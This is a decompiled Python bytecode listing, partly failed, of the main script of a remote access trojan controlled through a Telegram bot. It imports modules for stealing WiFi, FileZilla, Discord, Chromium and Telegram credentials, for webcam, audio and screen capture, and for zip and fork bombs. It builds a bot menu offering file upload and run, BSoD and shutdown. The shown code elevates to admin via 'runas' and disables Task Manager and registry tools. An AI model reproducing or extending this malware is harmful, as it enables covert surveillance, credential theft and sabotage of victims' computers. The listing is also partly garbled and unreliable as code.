
# file test/101383.pyc
# --- This code section failed: ---

 L.   1         0  LOAD_CONST               0
                2  LOAD_CONST               ('*',)
                4  IMPORT_NAME              RAT
                6  IMPORT_STAR      

 L.   3         8  LOAD_CONST               0
               10  LOAD_CONST               ('*',)
               12  IMPORT_NAME_ATTR         Core.Settings.Organization
               14  IMPORT_STAR      

 L.   4        16  LOAD_CONST               0
               18  LOAD_CONST               ('*',)
               20  IMPORT_NAME_ATTR         Core.Settings.Antivirus
               22  IMPORT_STAR      

 L.   5        24  LOAD_CONST               0
               26  LOAD_CONST               ('*',)
               28  IMPORT_NAME_ATTR         Core.Settings.Admin
               30  IMPORT_STAR      

 L.   6        32  LOAD_CONST               0
               34  LOAD_CONST               ('*',)
               36  IMPORT_NAME_ATTR         Core.Settings.CriticalProcess
               38  IMPORT_STAR      

 L.   7        40  LOAD_CONST               0
               42  LOAD_CONST               ('*',)
               44  IMPORT_NAME_ATTR         Core.Settings.MessageBox
               46  IMPORT_STAR      

 L.   9        48  LOAD_CONST               0
               50  LOAD_CONST               ('*',)
               52  IMPORT_NAME_ATTR         Core.Network.Information
               54  IMPORT_STAR      

 L.  10        56  LOAD_CONST               0
               58  LOAD_CONST               ('*',)
               60  IMPORT_NAME_ATTR         Core.Network.Location
               62  IMPORT_STAR      

 L.  12        64  LOAD_CONST               0
               66  LOAD_CONST               ('*',)
               68  IMPORT_NAME_ATTR         Core.Main.Screen
               70  IMPORT_STAR      

 L.  13        72  LOAD_CONST               0
               74  LOAD_CONST               ('*',)
               76  IMPORT_NAME_ATTR         Core.Main.Webcam
               78  IMPORT_STAR      

 L.  14        80  LOAD_CONST               0
               82  LOAD_CONST               ('*',)
               84  IMPORT_NAME_ATTR         Core.Main.Audio
               86  IMPORT_STAR      

 L.  15        88  LOAD_CONST               0
               90  LOAD_CONST               ('*',)
               92  IMPORT_NAME_ATTR         Core.Main.Power
               94  IMPORT_STAR      

 L.  16        96  LOAD_CONST               0
               98  LOAD_CONST               ('*',)
              100  IMPORT_NAME_ATTR         Core.Main.Autorun
              102  IMPORT_STAR      

 L.  18       104  LOAD_CONST               0
              106  LOAD_CONST               ('*',)
              108  IMPORT_NAME_ATTR         Core.Files.Tasklist
              110  IMPORT_STAR      

 L.  19       112  LOAD_CONST               0
              114  LOAD_CONST               ('*',)
              116  IMPORT_NAME_ATTR         Core.Files.Taskkill
              118  IMPORT_STAR      

 L.  21       120  LOAD_CONST               0
              122  LOAD_CONST               ('*',)
              124  IMPORT_NAME_ATTR         Core.Fun.Message
              126  IMPORT_STAR      

 L.  22       128  LOAD_CONST               0
              130  LOAD_CONST               ('*',)
              132  IMPORT_NAME_ATTR         Core.Fun.Speak
              134  IMPORT_STAR      

 L.  23       136  LOAD_CONST               0
              138  LOAD_CONST               ('*',)
              140  IMPORT_NAME_ATTR         Core.Fun.OpenURL
              142  IMPORT_STAR      

 L.  24       144  LOAD_CONST               0
              146  LOAD_CONST               ('*',)
              148  IMPORT_NAME_ATTR         Core.Fun.Wallpapers
              150  IMPORT_STAR      

 L.  26       152  LOAD_CONST               0
              154  LOAD_CONST               ('*',)
              156  IMPORT_NAME_ATTR         Core.Bomb.ZipBomb
              158  IMPORT_STAR      

 L.  27       160  LOAD_CONST               0
              162  LOAD_CONST               ('*',)
              164  IMPORT_NAME_ATTR         Core.Bomb.ForkBomb
              166  IMPORT_STAR      

 L.  29       168  LOAD_CONST               0
              170  LOAD_CONST               ('*',)
              172  IMPORT_NAME_ATTR         Core.Stealer.Wifi
              174  IMPORT_STAR      

 L.  30       176  LOAD_CONST               0
              178  LOAD_CONST               ('*',)
              180  IMPORT_NAME_ATTR         Core.Stealer.FileZilla
              182  IMPORT_STAR      

 L.  31       184  LOAD_CONST               0
              186  LOAD_CONST               ('*',)
              188  IMPORT_NAME_ATTR         Core.Stealer.Discord
              190  IMPORT_STAR      

 L.  32       192  LOAD_CONST               0
              194  LOAD_CONST               ('*',)
              196  IMPORT_NAME_ATTR         Core.Stealer.Chromium
              198  IMPORT_STAR      

 L.  33       200  LOAD_CONST               0
              202  LOAD_CONST               ('*',)
              204  IMPORT_NAME_ATTR         Core.Stealer.Telegram
              206  IMPORT_STAR      

 L.  35       208  LOAD_CONST               0
              210  LOAD_CONST               ('*',)
              212  IMPORT_NAME_ATTR         Core.Other.Clipboard
              214  IMPORT_STAR      

 L.  37       216  LOAD_CONST               0
              218  LOAD_CONST               ('*',)
              220  IMPORT_NAME_ATTR         Core.Other.SendKeys
              222  IMPORT_STAR      

 L.  38       224  LOAD_CONST               0
              226  LOAD_CONST               ('*',)
              228  IMPORT_NAME_ATTR         Core.Other.Monitor
              230  IMPORT_STAR      

 L.  39       232  LOAD_CONST               0
              234  LOAD_CONST               ('*',)
              236  IMPORT_NAME_ATTR         Core.Other.Volume
              238  IMPORT_STAR      

 L.  40       240  LOAD_CONST               0
              242  LOAD_CONST               ('*',)
              244  IMPORT_NAME_ATTR         Core.Other.Rotate
              246  IMPORT_STAR      

 L.  41       248  LOAD_CONST               0
              250  LOAD_CONST               ('*',)
              252  IMPORT_NAME_ATTR         Core.Other.Freeze
              254  IMPORT_STAR      

 L.  42       256  LOAD_CONST               0
              258  LOAD_CONST               ('*',)
              260  IMPORT_NAME_ATTR         Core.Other.DVD
              262  IMPORT_STAR      

 L.  44       264  LOAD_CONST               0
              266  LOAD_CONST               None
              268  IMPORT_NAME              telebot
              270  STORE_NAME               telebot

 L.  46       272  LOAD_NAME                telebot
              274  LOAD_ATTR                TeleBot
              276  LOAD_NAME                TelegramToken
              278  LOAD_CONST               True
              280  LOAD_CONST               ('threaded',)
              282  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              284  STORE_NAME               bot

 L.  47       286  LOAD_NAME                telebot
              288  LOAD_ATTR                util
              290  LOAD_ATTR                ThreadPool
              292  LOAD_CONST               50
              294  LOAD_CONST               ('num_threads',)
              296  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
              298  LOAD_NAME                bot
              300  STORE_ATTR               worker_pool

 L.  49       302  LOAD_NAME                telebot
              304  LOAD_ATTR                types
              306  LOAD_METHOD              ReplyKeyboardMarkup
              308  CALL_METHOD_0         0  ''
              310  STORE_NAME               menu

 L.  50       312  LOAD_NAME                telebot
              314  LOAD_ATTR                types
              316  LOAD_METHOD              KeyboardButton
              318  LOAD_STR                 '/1\n<<'
              320  CALL_METHOD_1         1  ''
              322  STORE_NAME               button1

 L.  51       324  LOAD_NAME                telebot
              326  LOAD_ATTR                types
              328  LOAD_METHOD              KeyboardButton
              330  LOAD_STR                 '/2\n>>'
              332  CALL_METHOD_1         1  ''
              334  STORE_NAME               button2

 L.  52       336  LOAD_NAME                telebot
              338  LOAD_ATTR                types
              340  LOAD_METHOD              KeyboardButton
              342  LOAD_STR                 '/Screen\n🖼'
              344  CALL_METHOD_1         1  ''
              346  STORE_NAME               button3

 L.  53       348  LOAD_NAME                telebot
              350  LOAD_ATTR                types
              352  LOAD_METHOD              KeyboardButton
              354  LOAD_STR                 '/Webcam\n📸'
              356  CALL_METHOD_1         1  ''
              358  STORE_NAME               button4

 L.  54       360  LOAD_NAME                telebot
              362  LOAD_ATTR                types
              364  LOAD_METHOD              KeyboardButton
              366  LOAD_STR                 '/Audio\n🎙'
              368  CALL_METHOD_1         1  ''
              370  STORE_NAME               button5

 L.  55       372  LOAD_NAME                telebot
              374  LOAD_ATTR                types
              376  LOAD_METHOD              KeyboardButton
              378  LOAD_STR                 '/Power\n🔴'
              380  CALL_METHOD_1         1  ''
              382  STORE_NAME               button6

 L.  56       384  LOAD_NAME                telebot
              386  LOAD_ATTR                types
              388  LOAD_METHOD              KeyboardButton
              390  LOAD_STR                 '/Autorun\n🔵'
              392  CALL_METHOD_1         1  ''
              394  STORE_NAME               button7

 L.  57       396  LOAD_NAME                menu
              398  LOAD_METHOD              row
              400  LOAD_NAME                button1
              402  LOAD_NAME                button3
              404  LOAD_NAME                button2
              406  CALL_METHOD_3         3  ''
              408  POP_TOP          

 L.  58       410  LOAD_NAME                menu
              412  LOAD_METHOD              row
              414  LOAD_NAME                button4
              416  LOAD_NAME                button5
              418  CALL_METHOD_2         2  ''
              420  POP_TOP          

 L.  59       422  LOAD_NAME                menu
              424  LOAD_METHOD              row
              426  LOAD_NAME                button6
              428  LOAD_NAME                button7
              430  CALL_METHOD_2         2  ''
              432  POP_TOP          

 L.  61       434  LOAD_NAME                telebot
              436  LOAD_ATTR                types
              438  LOAD_METHOD              InlineKeyboardMarkup
              440  CALL_METHOD_0         0  ''
              442  STORE_NAME               main2

 L.  62       444  LOAD_NAME                telebot
              446  LOAD_ATTR                types
              448  LOAD_ATTR                InlineKeyboardButton
              450  LOAD_STR                 'Hibernate - 🛑'
              452  LOAD_STR                 'hibernate'
              454  LOAD_CONST               ('callback_data',)
              456  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              458  STORE_NAME               button1

 L.  63       460  LOAD_NAME                telebot
              462  LOAD_ATTR                types
              464  LOAD_ATTR                InlineKeyboardButton
              466  LOAD_STR                 'Shutdown - ⛔️'
              468  LOAD_STR                 'shutdown'
              470  LOAD_CONST               ('callback_data',)
              472  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              474  STORE_NAME               button2

 L.  64       476  LOAD_NAME                telebot
              478  LOAD_ATTR                types
              480  LOAD_ATTR                InlineKeyboardButton
              482  LOAD_STR                 'Restart - ⭕️'
              484  LOAD_STR                 'restart'
              486  LOAD_CONST               ('callback_data',)
              488  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              490  STORE_NAME               button3

 L.  65       492  LOAD_NAME                telebot
              494  LOAD_ATTR                types
              496  LOAD_ATTR                InlineKeyboardButton
              498  LOAD_STR                 'Logoff - 💢'
              500  LOAD_STR                 'logoff'
              502  LOAD_CONST               ('callback_data',)
              504  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              506  STORE_NAME               button4

 L.  66       508  LOAD_NAME                telebot
              510  LOAD_ATTR                types
              512  LOAD_ATTR                InlineKeyboardButton
              514  LOAD_STR                 'BSoD - 🌀'
              516  LOAD_STR                 'bsod'
              518  LOAD_CONST               ('callback_data',)
              520  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              522  STORE_NAME               button5

 L.  67       524  LOAD_NAME                telebot
              526  LOAD_ATTR                types
              528  LOAD_ATTR                InlineKeyboardButton
              530  LOAD_STR                 '« Back'
              532  LOAD_STR                 'cancel'
              534  LOAD_CONST               ('callback_data',)
              536  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              538  STORE_NAME               button6

 L.  68       540  LOAD_NAME                main2
              542  LOAD_METHOD              row
              544  LOAD_NAME                button1
              546  CALL_METHOD_1         1  ''
              548  POP_TOP          

 L.  69       550  LOAD_NAME                main2
              552  LOAD_METHOD              row
              554  LOAD_NAME                button2
              556  CALL_METHOD_1         1  ''
              558  POP_TOP          

 L.  70       560  LOAD_NAME                main2
              562  LOAD_METHOD              row
              564  LOAD_NAME                button3
              566  CALL_METHOD_1         1  ''
              568  POP_TOP          

 L.  71       570  LOAD_NAME                main2
              572  LOAD_METHOD              row
              574  LOAD_NAME                button4
              576  CALL_METHOD_1         1  ''
              578  POP_TOP          

 L.  72       580  LOAD_NAME                main2
              582  LOAD_METHOD              row
              584  LOAD_NAME                button5
              586  CALL_METHOD_1         1  ''
              588  POP_TOP          

 L.  73       590  LOAD_NAME                main2
              592  LOAD_METHOD              row
              594  LOAD_NAME                button6
              596  CALL_METHOD_1         1  ''
              598  POP_TOP          

 L.  75       600  LOAD_NAME                telebot
              602  LOAD_ATTR                types
              604  LOAD_METHOD              InlineKeyboardMarkup
              606  CALL_METHOD_0         0  ''
              608  STORE_NAME               main3

 L.  76       610  LOAD_NAME                telebot
              612  LOAD_ATTR                types
              614  LOAD_ATTR                InlineKeyboardButton
              616  LOAD_STR                 'Add to Startup - 📥'
              618  LOAD_STR                 'startup'
              620  LOAD_CONST               ('callback_data',)
              622  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              624  STORE_NAME               button1

 L.  77       626  LOAD_NAME                telebot
              628  LOAD_ATTR                types
              630  LOAD_ATTR                InlineKeyboardButton
              632  LOAD_STR                 'Uninstall - ♻️'
              634  LOAD_STR                 'confirm'
              636  LOAD_CONST               ('callback_data',)
              638  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              640  STORE_NAME               button2

 L.  78       642  LOAD_NAME                telebot
              644  LOAD_ATTR                types
              646  LOAD_ATTR                InlineKeyboardButton
              648  LOAD_STR                 '« Back'
              650  LOAD_STR                 'cancel'
              652  LOAD_CONST               ('callback_data',)
              654  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              656  STORE_NAME               button3

 L.  79       658  LOAD_NAME                main3
              660  LOAD_METHOD              row
              662  LOAD_NAME                button1
              664  CALL_METHOD_1         1  ''
              666  POP_TOP          

 L.  80       668  LOAD_NAME                main3
              670  LOAD_METHOD              row
              672  LOAD_NAME                button2
              674  CALL_METHOD_1         1  ''
              676  POP_TOP          

 L.  81       678  LOAD_NAME                main3
              680  LOAD_METHOD              row
              682  LOAD_NAME                button3
              684  CALL_METHOD_1         1  ''
              686  POP_TOP          

 L.  83       688  LOAD_NAME                telebot
              690  LOAD_ATTR                types
              692  LOAD_METHOD              InlineKeyboardMarkup
              694  CALL_METHOD_0         0  ''
              696  STORE_NAME               main4

 L.  84       698  LOAD_NAME                telebot
              700  LOAD_ATTR                types
              702  LOAD_ATTR                InlineKeyboardButton
              704  LOAD_STR                 'Yes, im sure!'
              706  LOAD_STR                 'uninstall'
              708  LOAD_CONST               ('callback_data',)
              710  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              712  STORE_NAME               button1

 L.  85       714  LOAD_NAME                telebot
              716  LOAD_ATTR                types
              718  LOAD_ATTR                InlineKeyboardButton
              720  LOAD_STR                 'Hell no!'
              722  LOAD_STR                 'cancel'
              724  LOAD_CONST               ('callback_data',)
              726  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              728  STORE_NAME               button2

 L.  86       730  LOAD_NAME                telebot
              732  LOAD_ATTR                types
              734  LOAD_ATTR                InlineKeyboardButton
              736  LOAD_STR                 '« Back'
              738  LOAD_STR                 'cancel'
              740  LOAD_CONST               ('callback_data',)
              742  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              744  STORE_NAME               button3

 L.  87       746  LOAD_NAME                main4
              748  LOAD_METHOD              row
              750  LOAD_NAME                button1
              752  CALL_METHOD_1         1  ''
              754  POP_TOP          

 L.  88       756  LOAD_NAME                main4
              758  LOAD_METHOD              row
              760  LOAD_NAME                button2
              762  CALL_METHOD_1         1  ''
              764  POP_TOP          

 L.  89       766  LOAD_NAME                main4
              768  LOAD_METHOD              row
              770  LOAD_NAME                button3
              772  CALL_METHOD_1         1  ''
              774  POP_TOP          

 L.  91       776  LOAD_NAME                telebot
              778  LOAD_ATTR                types
              780  LOAD_METHOD              ReplyKeyboardMarkup
              782  CALL_METHOD_0         0  ''
              784  STORE_NAME               main5

 L.  92       786  LOAD_NAME                telebot
              788  LOAD_ATTR                types
              790  LOAD_METHOD              KeyboardButton
              792  LOAD_STR                 '/3\n<<'
              794  CALL_METHOD_1         1  ''
              796  STORE_NAME               button1

 L.  93       798  LOAD_NAME                telebot
              800  LOAD_ATTR                types
              802  LOAD_METHOD              KeyboardButton
              804  LOAD_STR                 '/4\n>>'
              806  CALL_METHOD_1         1  ''
              808  STORE_NAME               button2

 L.  94       810  LOAD_NAME                telebot
              812  LOAD_ATTR                types
              814  LOAD_METHOD              KeyboardButton
              816  LOAD_STR                 '/Screen\n🖼'
              818  CALL_METHOD_1         1  ''
              820  STORE_NAME               button3

 L.  95       822  LOAD_NAME                telebot
              824  LOAD_ATTR                types
              826  LOAD_METHOD              KeyboardButton
              828  LOAD_STR                 '/Files\n💾'
              830  CALL_METHOD_1         1  ''
              832  STORE_NAME               button4

 L.  96       834  LOAD_NAME                telebot
              836  LOAD_ATTR                types
              838  LOAD_METHOD              KeyboardButton
              840  LOAD_STR                 '/Tasklist\n📋'
              842  CALL_METHOD_1         1  ''
              844  STORE_NAME               button5

 L.  97       846  LOAD_NAME                telebot
              848  LOAD_ATTR                types
              850  LOAD_METHOD              KeyboardButton
              852  LOAD_STR                 '/Taskkill\n📝'
              854  CALL_METHOD_1         1  ''
              856  STORE_NAME               button6

 L.  98       858  LOAD_NAME                main5
              860  LOAD_METHOD              row
              862  LOAD_NAME                button1
              864  LOAD_NAME                button3
              866  LOAD_NAME                button2
              868  CALL_METHOD_3         3  ''
              870  POP_TOP          

 L.  99       872  LOAD_NAME                main5
              874  LOAD_METHOD              row
              876  LOAD_NAME                button4
              878  CALL_METHOD_1         1  ''
              880  POP_TOP          

 L. 100       882  LOAD_NAME                main5
              884  LOAD_METHOD              row
              886  LOAD_NAME                button5
              888  LOAD_NAME                button6
              890  CALL_METHOD_2         2  ''
              892  POP_TOP          

 L. 102       894  LOAD_NAME                telebot
              896  LOAD_ATTR                types
              898  LOAD_METHOD              InlineKeyboardMarkup
              900  CALL_METHOD_0         0  ''
              902  STORE_NAME               main6

 L. 103       904  LOAD_NAME                telebot
              906  LOAD_ATTR                types
              908  LOAD_ATTR                InlineKeyboardButton
              910  LOAD_STR                 'Kill all Processes'
              912  LOAD_STR                 'taskkill all'
              914  LOAD_CONST               ('callback_data',)
              916  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              918  STORE_NAME               button1

 L. 104       920  LOAD_NAME                telebot
              922  LOAD_ATTR                types
              924  LOAD_ATTR                InlineKeyboardButton
              926  LOAD_STR                 'Disable Task Manager'
              928  LOAD_STR                 'disabletaskmgr'
              930  LOAD_CONST               ('callback_data',)
              932  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              934  STORE_NAME               button2

 L. 105       936  LOAD_NAME                main6
              938  LOAD_METHOD              row
              940  LOAD_NAME                button1
              942  CALL_METHOD_1         1  ''
              944  POP_TOP          

 L. 106       946  LOAD_NAME                main6
              948  LOAD_METHOD              row
              950  LOAD_NAME                button2
              952  CALL_METHOD_1         1  ''
              954  POP_TOP          

 L. 108       956  LOAD_NAME                telebot
              958  LOAD_ATTR                types
              960  LOAD_METHOD              ReplyKeyboardMarkup
              962  CALL_METHOD_0         0  ''
              964  STORE_NAME               main7

 L. 109       966  LOAD_NAME                telebot
              968  LOAD_ATTR                types
              970  LOAD_METHOD              KeyboardButton
              972  LOAD_STR                 '/CD\n🗂'
              974  CALL_METHOD_1         1  ''
              976  STORE_NAME               button1

 L. 110       978  LOAD_NAME                telebot
              980  LOAD_ATTR                types
              982  LOAD_METHOD              KeyboardButton
              984  LOAD_STR                 '/Upload\n📡'
              986  CALL_METHOD_1         1  ''
              988  STORE_NAME               button2

 L. 111       990  LOAD_NAME                telebot
              992  LOAD_ATTR                types
              994  LOAD_METHOD              KeyboardButton
              996  LOAD_STR                 '/ls\n📄'
              998  CALL_METHOD_1         1  ''
             1000  STORE_NAME               button3

 L. 112      1002  LOAD_NAME                telebot
             1004  LOAD_ATTR                types
             1006  LOAD_METHOD              KeyboardButton
             1008  LOAD_STR                 '/Remove\n🗑'
             1010  CALL_METHOD_1         1  ''
             1012  STORE_NAME               button4

 L. 113      1014  LOAD_NAME                telebot
             1016  LOAD_ATTR                types
             1018  LOAD_METHOD              KeyboardButton
             1020  LOAD_STR                 '/Download\n📨'
             1022  CALL_METHOD_1         1  ''
             1024  STORE_NAME               button5

 L. 114      1026  LOAD_NAME                telebot
             1028  LOAD_ATTR                types
             1030  LOAD_METHOD              KeyboardButton
             1032  LOAD_STR                 '/Run\n📌'
             1034  CALL_METHOD_1         1  ''
             1036  STORE_NAME               button6

 L. 115      1038  LOAD_NAME                telebot
             1040  LOAD_ATTR                types
             1042  LOAD_METHOD              KeyboardButton
             1044  LOAD_STR                 '/Cancel'
             1046  CALL_METHOD_1         1  ''
             1048  STORE_NAME               button7

 L. 116      1050  LOAD_NAME                main7
             1052  LOAD_METHOD              row
             1054  LOAD_NAME                button1
             1056  LOAD_NAME                button2
             1058  LOAD_NAME                button3
             1060  CALL_METHOD_3         3  ''
             1062  POP_TOP          

 L. 117      1064  LOAD_NAME                main7
             1066  LOAD_METHOD              row
             1068  LOAD_NAME                button4
             1070  LOAD_NAME                button5
             1072  LOAD_NAME                button6
             1074  CALL_METHOD_3         3  ''
             1076  POP_TOP          

 L. 118      1078  LOAD_NAME                main7
             1080  LOAD_METHOD              row
             1082  LOAD_NAME                button7
             1084  CALL_METHOD_1         1  ''
             1086  POP_TOP          

 L. 120      1088  LOAD_NAME                telebot
             1090  LOAD_ATTR                types
             1092  LOAD_METHOD              ReplyKeyboardMarkup
             1094  CALL_METHOD_0         0  ''
             1096  STORE_NAME               main8

 L. 121      1098  LOAD_NAME                telebot
             1100  LOAD_ATTR                types
             1102  LOAD_METHOD              KeyboardButton
             1104  LOAD_STR                 '/5\n<<'
             1106  CALL_METHOD_1         1  ''
             1108  STORE_NAME               button1

 L. 122      1110  LOAD_NAME                telebot
             1112  LOAD_ATTR                types
             1114  LOAD_METHOD              KeyboardButton
             1116  LOAD_STR                 '/6\n>>'
             1118  CALL_METHOD_1         1  ''
             1120  STORE_NAME               button2

 L. 123      1122  LOAD_NAME                telebot
             1124  LOAD_ATTR                types
             1126  LOAD_METHOD              KeyboardButton
             1128  LOAD_STR                 '/Screen\n🖼'
             1130  CALL_METHOD_1         1  ''
             1132  STORE_NAME               button3

 L. 124      1134  LOAD_NAME                telebot
             1136  LOAD_ATTR                types
             1138  LOAD_METHOD              KeyboardButton
             1140  LOAD_STR                 '/Message\n💬'
             1142  CALL_METHOD_1         1  ''
             1144  STORE_NAME               button4

 L. 125      1146  LOAD_NAME                telebot
             1148  LOAD_ATTR                types
             1150  LOAD_METHOD              KeyboardButton
             1152  LOAD_STR                 '/Speak\n📢'
             1154  CALL_METHOD_1         1  ''
             1156  STORE_NAME               button5

 L. 126      1158  LOAD_NAME                telebot
             1160  LOAD_ATTR                types
             1162  LOAD_METHOD              KeyboardButton
             1164  LOAD_STR                 '/OpenURL\n🌐'
             1166  CALL_METHOD_1         1  ''
             1168  STORE_NAME               button6

 L. 127      1170  LOAD_NAME                telebot
             1172  LOAD_ATTR                types
             1174  LOAD_METHOD              KeyboardButton
             1176  LOAD_STR                 '/Wallpapers\n🧩'
             1178  CALL_METHOD_1         1  ''
             1180  STORE_NAME               button7

 L. 128      1182  LOAD_NAME                main8
             1184  LOAD_METHOD              row
             1186  LOAD_NAME                button1
             1188  LOAD_NAME                button3
             1190  LOAD_NAME                button2
             1192  CALL_METHOD_3         3  ''
             1194  POP_TOP          

 L. 129      1196  LOAD_NAME                main8
             1198  LOAD_METHOD              row
             1200  LOAD_NAME                button4
             1202  LOAD_NAME                button5
             1204  CALL_METHOD_2         2  ''
             1206  POP_TOP          

 L. 130      1208  LOAD_NAME                main8
             1210  LOAD_METHOD              row
             1212  LOAD_NAME                button6
             1214  LOAD_NAME                button7
             1216  CALL_METHOD_2         2  ''
             1218  POP_TOP          

 L. 135      1220  LOAD_NAME                os
             1222  LOAD_ATTR                path
             1224  LOAD_METHOD              basename
             1226  LOAD_NAME                sys
             1228  LOAD_ATTR                argv
             1230  LOAD_CONST               0
             1232  BINARY_SUBSCR    
             1234  CALL_METHOD_1         1  ''
             1236  STORE_NAME               CurrentName

 L. 136      1238  LOAD_NAME                sys
             1240  LOAD_ATTR                argv
             1242  LOAD_CONST               0
             1244  BINARY_SUBSCR    
             1246  STORE_NAME               CurrentPath

 L. 139      1248  LOAD_NAME                Directory

 L. 140      1250  LOAD_NAME                Directory
             1252  LOAD_STR                 'Documents'
             1254  BINARY_ADD       

 L. 141      1256  LOAD_NAME                Directory
             1258  LOAD_STR                 'Photos'
             1260  BINARY_ADD       

 L. 138      1262  BUILD_LIST_3          3 
             1264  STORE_NAME               RAT

 L. 144      1266  LOAD_NAME                RAT
             1268  GET_ITER         
           1270_0  COME_FROM          1284  '1284'
             1270  FOR_ITER           1302  'to 1302'
             1272  STORE_NAME               Directories

 L. 146      1274  LOAD_NAME                os
             1276  LOAD_ATTR                path
             1278  LOAD_METHOD              exists
             1280  LOAD_NAME                Directories
             1282  CALL_METHOD_1         1  ''
         1284_1286  POP_JUMP_IF_TRUE   1270  'to 1270'

 L. 147      1288  LOAD_NAME                os
             1290  LOAD_METHOD              makedirs
             1292  LOAD_NAME                Directories
             1294  CALL_METHOD_1         1  ''
             1296  POP_TOP          
         1298_1300  JUMP_BACK          1270  'to 1270'

 L. 152      1302  LOAD_NAME                AdminRightsRequired
             1304  LOAD_CONST               True
             1306  <117>                 0  ''
         1308_1310  POP_JUMP_IF_FALSE  1390  'to 1390'

 L. 154      1312  LOAD_NAME                Admin
             1314  CALL_FUNCTION_0       0  ''
             1316  LOAD_CONST               False
             1318  <117>                 0  ''
         1320_1322  POP_JUMP_IF_FALSE  1390  'to 1390'

 L. 156      1324  SETUP_FINALLY      1350  'to 1350'

 L. 157      1326  LOAD_NAME                print
             1328  LOAD_STR                 '[~] › Trying elevate previleges to administrator\n'
             1330  CALL_FUNCTION_1       1  ''
             1332  POP_TOP          

 L. 158      1334  LOAD_NAME                os
             1336  LOAD_METHOD              startfile
             1338  LOAD_NAME                CurrentPath
             1340  LOAD_STR                 'runas'
             1342  CALL_METHOD_2         2  ''
             1344  POP_TOP          
             1346  POP_BLOCK        
             1348  JUMP_FORWARD       1362  'to 1362'
           1350_0  COME_FROM_FINALLY  1324  '1324'

 L. 159      1350  POP_TOP          
             1352  POP_TOP          
             1354  POP_TOP          

 L. 160      1356  POP_EXCEPT       
             1358  JUMP_BACK          1324  'to 1324'
             1360  <48>             
           1362_0  COME_FROM          1348  '1348'

 L. 162      1362  LOAD_NAME                print
             1364  LOAD_STR                 '[+] › '
             1366  LOAD_NAME                CurrentName
             1368  BINARY_ADD       
             1370  LOAD_STR                 ' opened as admin rights\n'
             1372  BINARY_ADD       
             1374  CALL_FUNCTION_1       1  ''
             1376  POP_TOP          

 L. 163      1378  LOAD_NAME                sys
             1380  LOAD_METHOD              exit
             1382  CALL_METHOD_0         0  ''
             1384  POP_TOP          
         1386_1388  JUMP_BACK          1324  'to 1324'
           1390_0  COME_FROM          1320  '1320'
           1390_1  COME_FROM          1308  '1308'

 L. 168      1390  LOAD_NAME                DisableTaskManager
             1392  LOAD_CONST               True
             1394  <117>                 0  ''
         1396_1398  POP_JUMP_IF_FALSE  1492  'to 1492'

 L. 170      1400  LOAD_NAME                os
             1402  LOAD_ATTR                path
             1404  LOAD_METHOD              exists
             1406  LOAD_NAME                Directory
             1408  LOAD_STR                 'RegeditDisableTaskManager'
             1410  BINARY_ADD       
             1412  CALL_METHOD_1         1  ''
         1414_1416  POP_JUMP_IF_FALSE  1428  'to 1428'

 L. 171      1418  LOAD_NAME                print
             1420  LOAD_STR                 '[+] › taskmgr.exe is already disabled\n'
             1422  CALL_FUNCTION_1       1  ''
             1424  POP_TOP          
             1426  JUMP_FORWARD       1492  'to 1492'
           1428_0  COME_FROM          1414  '1414'

 L. 174      1428  LOAD_NAME                Admin
             1430  CALL_FUNCTION_0       0  ''
             1432  LOAD_CONST               False
             1434  <117>                 0  ''
         1436_1438  POP_JUMP_IF_FALSE  1448  'to 1448'

 L. 175      1440  LOAD_NAME                print
             1442  LOAD_STR                 '[-] › This function requires admin rights\n'
             1444  CALL_FUNCTION_1       1  ''
             1446  POP_TOP          
           1448_0  COME_FROM          1436  '1436'

 L. 177      1448  LOAD_NAME                Admin
             1450  CALL_FUNCTION_0       0  ''
             1452  LOAD_CONST               True
             1454  <117>                 0  ''
         1456_1458  POP_JUMP_IF_FALSE  1492  'to 1492'

 L. 178      1460  LOAD_NAME                RegeditDisableTaskManager
             1462  CALL_FUNCTION_0       0  ''
             1464  POP_TOP          

 L. 179      1466  LOAD_NAME                open
             1468  LOAD_NAME                Directory
             1470  LOAD_STR                 'RegeditDisableTaskManager'
             1472  BINARY_ADD       
             1474  LOAD_STR                 'a'
             1476  CALL_FUNCTION_2       2  ''
             1478  LOAD_METHOD              close
             1480  CALL_METHOD_0         0  ''
             1482  POP_TOP          

 L. 180      1484  LOAD_NAME                print
             1486  LOAD_STR                 '[+] › taskmgr.exe has been disabled\n'
             1488  CALL_FUNCTION_1       1  ''
             1490  POP_TOP          
           1492_0  COME_FROM          1456  '1456'
           1492_1  COME_FROM          1426  '1426'
           1492_2  COME_FROM          1396  '1396'

 L. 185      1492  LOAD_NAME                DisableRegistryTools
             1494  LOAD_CONST               True
             1496  <117>                 0  ''
         1498_1500  POP_JUMP_IF_FALSE  1594  'to 1594'

 L. 187      1502  LOAD_NAME                os
             1504  LOAD_ATTR                path
             1506  LOAD_METHOD              exists
             1508  LOAD_NAME                Directory
             1510  LOAD_STR                 'RegeditDisableRegistryTools'
             1512  BINARY_ADD       
             1514  CALL_METHOD_1         1  ''
         1516_1518  POP_JUMP_IF_FALSE  1530  'to 1530'

 L. 188      1520  LOAD_NAME                print
             1522  LOAD_STR                 '[+] › regedit.exe is already disabled\n'
             1524  CALL_FUNCTION_1       1  ''
             1526  POP_TOP          
             1528  JUMP_FORWARD       1594  'to 1594'
           1530_0  COME_FROM          1516  '1516'

 L. 191      1530  LOAD_NAME                Admin
             1532  CALL_FUNCTION_0       0  ''
             1534  LOAD_CONST               False
             1536  <117>                 0  ''
         1538_1540  POP_JUMP_IF_FALSE  1550  'to 1550'

 L. 192      1542  LOAD_NAME                print
             1544  LOAD_STR                 '[-] › This function requires admin rights\n'
             1546  CALL_FUNCTION_1       1  ''
             1548  POP_TOP          
           1550_0  COME_FROM          1538  '1538'

 L. 194      1550  LOAD_NAME                Admin
